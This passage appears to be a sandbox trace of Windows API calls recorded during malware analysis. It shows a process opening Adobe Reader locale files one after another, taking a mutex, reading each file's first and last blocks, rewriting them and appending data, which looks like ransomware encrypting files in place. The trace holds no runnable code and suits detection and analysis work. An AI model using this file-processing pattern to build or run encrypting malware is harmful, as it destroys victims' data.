10.0\\reader\\locale\\fi_fi\\sendmail.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3c00 [0077.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.170] ReleaseMutex (hMutex=0x168) returned 1 [0077.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SUO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SUO", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.SUO", lpUsedDefaultChar=0x0) returned 12 [0077.170] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2c00 [0077.173] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2c00 [0077.173] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.174] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.174] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] CloseHandle (hObject=0x1dc) returned 1 [0077.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\AdobeCollabSync.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\adobecollabsync.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0077.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.175] ReleaseMutex (hMutex=0x168) returned 1 [0077.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.FRA", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0077.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.FRA", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.FRA", lpUsedDefaultChar=0x0) returned 19 [0077.176] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0077.178] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0077.178] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0077.178] CloseHandle (hObject=0x1dc) returned 1 [0077.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\IA32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\ia32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.179] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.179] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe00 [0077.179] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.180] ReleaseMutex (hMutex=0x168) returned 1 [0077.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.FRA", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0077.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.FRA", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.FRA", lpUsedDefaultChar=0x0) returned 8 [0077.180] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0077.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0077.182] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0077.182] CloseHandle (hObject=0x1dc) returned 1 [0077.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\SaveAsRTF.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\saveasrtf.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4e00 [0077.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.183] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.183] ReleaseMutex (hMutex=0x168) returned 1 [0077.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.FRA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.FRA", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.FRA", lpUsedDefaultChar=0x0) returned 13 [0077.184] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3e00 [0077.186] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3e00 [0077.186] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.187] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] CloseHandle (hObject=0x1dc) returned 1 [0077.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Accessibility.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\accessibility.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xac00 [0077.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.188] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.189] ReleaseMutex (hMutex=0x168) returned 1 [0077.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.HRV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.HRV", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.HRV", lpUsedDefaultChar=0x0) returned 17 [0077.189] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.191] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9c00 [0077.191] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9c00 [0077.193] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.193] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.193] WriteFile (in: hFile=0x1dc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.194] CloseHandle (hObject=0x1dc) returned 1 [0077.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\eBook.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\ebook.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.195] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0077.195] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.195] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.195] ReleaseMutex (hMutex=0x168) returned 1 [0077.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.HRV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0077.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.HRV", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.HRV", lpUsedDefaultChar=0x0) returned 9 [0077.195] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0077.197] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0077.197] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0077.198] CloseHandle (hObject=0x1dc) returned 1 [0077.198] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\ReadOutLoud.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\readoutloud.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0077.199] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.199] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.199] ReleaseMutex (hMutex=0x168) returned 1 [0077.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.HRV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.HRV", cchWideChar=15, lpMultiByteStr=0x1f7320c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.HRV", lpUsedDefaultChar=0x0) returned 15 [0077.199] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.201] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0077.202] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.202] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0077.202] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.203] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.203] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.203] CloseHandle (hObject=0x1dc) returned 1 [0077.203] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Updater.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\updater.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.204] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.204] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2800 [0077.204] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.204] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.204] ReleaseMutex (hMutex=0x168) returned 1 [0077.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.HRV", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.HRV", lpUsedDefaultChar=0x0) returned 11 [0077.205] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.989] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1800 [0077.990] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.991] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1800 [0077.992] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.992] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.992] WriteFile (in: hFile=0x1dc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.992] CloseHandle (hObject=0x1dc) returned 1 [0077.993] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\DigSig.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\digsig.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0077.993] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.994] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x20000 [0077.994] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0077.994] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.016] ReleaseMutex (hMutex=0x168) returned 1 [0078.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.HUN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.HUN", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.HUN", 